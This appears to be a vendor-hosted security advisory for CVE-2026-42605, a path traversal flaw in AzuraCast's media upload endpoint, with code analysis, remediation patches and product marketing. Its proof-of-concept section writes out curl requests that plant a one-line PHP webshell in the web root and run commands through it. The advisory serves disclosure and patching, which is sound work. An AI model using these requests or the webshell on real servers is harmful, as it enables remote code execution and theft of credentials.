CVE-2026-42605

CVE-2026-42605 is a high-severity path traversal vulnerability in azuracast/azuracast (composer), affecting versions <= 0.23.5. It is fixed in 0.23.6.

Summary

The currentDirectory request parameter in the Flow.js media upload endpoint (POST /api/station/{station_id}/files/upload) is not sanitized for path traversal sequences. When combined with a local filesystem storage backend (the default), an authenticated user with media management permissions can write arbitrary files outside the station's media storage directory, achieving remote code execution by writing a PHP webshell to the web root.

Details

In backend/src/Controller/Api/Stations/Files/FlowUploadAction.php, the currentDirectory parameter is read directly from user input at line 79 and prepended to the sanitized filename at line 83:

// FlowUploadAction.php:79-84
$currentDir = Types::string($request->getParam('currentDirectory'));

$destPath = $flowResponse->getClientFullPath();
if (!empty($currentDir)) {
    $destPath = $currentDir . '/' . $destPath;
}

While $flowResponse->getClientFullPath() is sanitized via UploadedFile::filterClientPath() (which strips .. segments), the $currentDir value is prepended after this sanitization, reintroducing traversal capability.

This $destPath is passed to MediaProcessor::processAndUpload() at line 95-98. The critical issue is in the finally block at backend/src/Media/MediaProcessor.php:114-117:

// MediaProcessor.php:75-117
try {
    if (MimeType::isFileProcessable($localPath)) {
        // ... process media ...
        return $record;
    }
    // ...
    throw CannotProcessMediaException::forPath($path, 'File type cannot be processed.');
} catch (CannotProcessMediaException $e) {
    $this->unprocessableMediaRepo->setForPath($storageLocation, $path, $e->getMessage());
    throw $e;
} finally {
    $fs->uploadAndDeleteOriginal($localPath, $path);  // ALWAYS executes
}

The finally block writes the file to the traversed path regardless of whether the file passes MIME type validation. A .php file triggers CannotProcessMediaException, but the finally block still copies it to the destination before the exception propagates.

For local storage (the default), LocalFilesystem::upload() at backend/src/Flysystem/LocalFilesystem.php:45-57 resolves the path via getLocalPath():

// LocalFilesystem.php:45-57
public function upload(string $localPath, string $to): void
{
    $destPath = $this->getLocalPath($to);  // PathPrefixer::prefixPath(), simple concatenation
    $this->ensureDirectoryExists(dirname($destPath), ...);
    copy($localPath, $destPath);  // OS resolves ../
}

getLocalPath() delegates to PathPrefixer::prefixPath() (League Flysystem), which performs simple string concatenation without normalization. This bypasses the WhitespacePathNormalizer that would catch traversal if the path went through the standard Filesystem::write()/writeStream() methods. The OS-level copy() then resolves ../ sequences, writing outside the media root.

Note: RemoteFilesystem::upload() uses $this->writeStream() which DOES go through the normalizer, so S3/remote backends are not affected. Only local storage (the default configuration) is vulnerable.

The route at backend/config/routes/api_station.php:399-405 requires StationPermissions::Media, a permission granted to DJs and station managers, not only admins.

PoC

Assuming AzuraCast is running locally with a station (ID 1) using local filesystem storage and the attacker has a valid API key with Media permissions:

Step 1: Upload a PHP webshell via path traversal

curl -X POST "http://localhost/api/station/1/files/upload" \
  -H "Authorization: Bearer <API_KEY_WITH_MEDIA_PERMISSION>" \
  -F "flowTotalChunks=1" \
  -F "flowChunkNumber=1" \
  -F "flowCurrentChunkSize=44" \
  -F "flowTotalSize=44" \
  -F "flowIdentifier=abc123" \
  -F "flowFilename=shell.php" \
  -F "currentDirectory=../../../../../var/azuracast/www/public" \
  -F "[email protected]"

Where shell.php contains:

<?php system($_GET['cmd']); ?>

Expected response: An error JSON (because .php is not a processable media type), but the file has already been written by the finally block.

Step 2: Execute commands via the webshell

curl "http://localhost/shell.php?cmd=id"

Expected output:

uid=1000(azuracast) gid=1000(azuracast) groups=1000(azuracast)

Impact

  • Remote Code Execution: An authenticated user with DJ or station manager privileges can write arbitrary PHP files to the web root and execute arbitrary system commands as the AzuraCast application user.
  • Full Server Compromise: The attacker can read configuration files (database credentials, API keys), access all station data, modify application code, and potentially escalate to root depending on system configuration.
  • Privilege Escalation: A DJ-level user (lowest privileged role with media access) can achieve the equivalent of full system administrator access.
  • Data Exfiltration: All station data, user credentials, and application secrets become accessible.

Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files. Typical impact: unauthorized file read or write outside the intended directory.

CVE-2026-42605 has a CVSS score of 8.8 (High). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.23.6); upgrading removes the vulnerable code path.

Affected versions

azuracast/azuracast (<= 0.23.5)

Security releases

azuracast/azuracast → 0.23.6 (composer)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Sanitize currentDirectory in FlowUploadAction.php using the same filterClientPath() method used for filenames:

// FlowUploadAction.php, replace line 79:
$currentDir = Types::string($request->getParam('currentDirectory'));

// With:
$currentDir = UploadedFile::filterClientPath(
    Types::string($request->getParam('currentDirectory'))
);

Additionally, harden LocalFilesystem::upload() to normalize paths before use:

// LocalFilesystem.php, add path normalization in upload():
public function upload(string $localPath, string $to): void
{
    $normalizer = new WhitespacePathNormalizer();
    $to = $normalizer->normalizePath($to);  // Throws PathTraversalDetected on ../

    $destPath = $this->getLocalPath($to);
    $this->ensureDirectoryExists(
        dirname($destPath),
        $this->visibilityConverter->defaultForDirectories()
    );

    if (!@copy($localPath, $destPath)) {
        throw UnableToCopyFile::fromLocationTo($localPath, $destPath);
    }
}

Also sanitize flowIdentifier in Flow.php:67 to prevent secondary traversal in chunk directory creation.

Frequently Asked Questions

  1. What is CVE-2026-42605? CVE-2026-42605 is a high-severity path traversal vulnerability in azuracast/azuracast (composer), affecting versions <= 0.23.5. It is fixed in 0.23.6. Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files.
  2. How severe is CVE-2026-42605? CVE-2026-42605 has a CVSS score of 8.8 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of azuracast/azuracast are affected by CVE-2026-42605? azuracast/azuracast (composer) versions <= 0.23.5 is affected.
  4. Is there a fix for CVE-2026-42605? Yes. CVE-2026-42605 is fixed in 0.23.6. Upgrade to this version or later.
  5. Is CVE-2026-42605 exploitable, and should I be worried? Whether CVE-2026-42605 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-42605 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-42605? Upgrade azuracast/azuracast to 0.23.6 or later.

Other vulnerabilities in azuracast/azuracast

CVE-2026-42606CVE-2026-42605CVE-2025-67737CVE-2023-2531CVE-2023-2191

Stop the waste.
Protect your environment with Kodem.